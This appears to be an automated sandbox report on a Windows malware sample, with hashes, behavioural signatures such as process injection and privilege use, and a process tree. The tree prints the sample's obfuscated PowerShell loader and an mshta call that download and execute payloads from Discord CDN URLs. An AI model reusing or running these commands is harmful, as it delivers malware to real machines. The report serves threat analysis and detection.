Analysis
-
max time kernel
35s -
max time network
119s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
21-07-2021 20:45
Static task
static1
Behavioral task
behavioral1
Sample
e27318b5d518aedb83accec2767fa87d.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
e27318b5d518aedb83accec2767fa87d.exe
Resource
win10v20210408
General
-
Target
e27318b5d518aedb83accec2767fa87d.exe
-
Size
326KB
-
MD5
e27318b5d518aedb83accec2767fa87d
-
SHA1
b66e7afa9b5c6bf8fa0634f0490b25c5cfd9d20e
-
SHA256
e15a30747a6b21794d76525b32ee3c32521bb917839ae3b2519f4e174cfe107f
-
SHA512
90c0bc18234036b9e802bf2aefdff646e866ad4313f8d9b063c7a5c9d4b4031f4824e5d535964295411216b12e6efc169ffc11ebaa7cdcb97d181a66fc57cbaa
Malware Config
Extracted
https://cdn.discordapp.com/attachments/862345240970264589/867428387840983060/langwige.txt
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 5 1524 mshta.exe 7 1524 mshta.exe 9 1896 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1896 set thread context of 1940 1896 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1896 powershell.exe 1896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 1940 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
e27318b5d518aedb83accec2767fa87d.exemshta.exepowershell.exedescription pid process target process PID 2016 wrote to memory of 1524 2016 e27318b5d518aedb83accec2767fa87d.exe mshta.exe PID 2016 wrote to memory of 1524 2016 e27318b5d518aedb83accec2767fa87d.exe mshta.exe PID 2016 wrote to memory of 1524 2016 e27318b5d518aedb83accec2767fa87d.exe mshta.exe PID 1524 wrote to memory of 1896 1524 mshta.exe powershell.exe PID 1524 wrote to memory of 1896 1524 mshta.exe powershell.exe PID 1524 wrote to memory of 1896 1524 mshta.exe powershell.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe PID 1896 wrote to memory of 1940 1896 powershell.exe aspnet_compiler.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e27318b5d518aedb83accec2767fa87d.exe"C:\Users\Admin\AppData\Local\Temp\e27318b5d518aedb83accec2767fa87d.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/862345240970264589/867428528105848832/uninstall.txt2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/862345240970264589/867428387840983060/langwige.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
-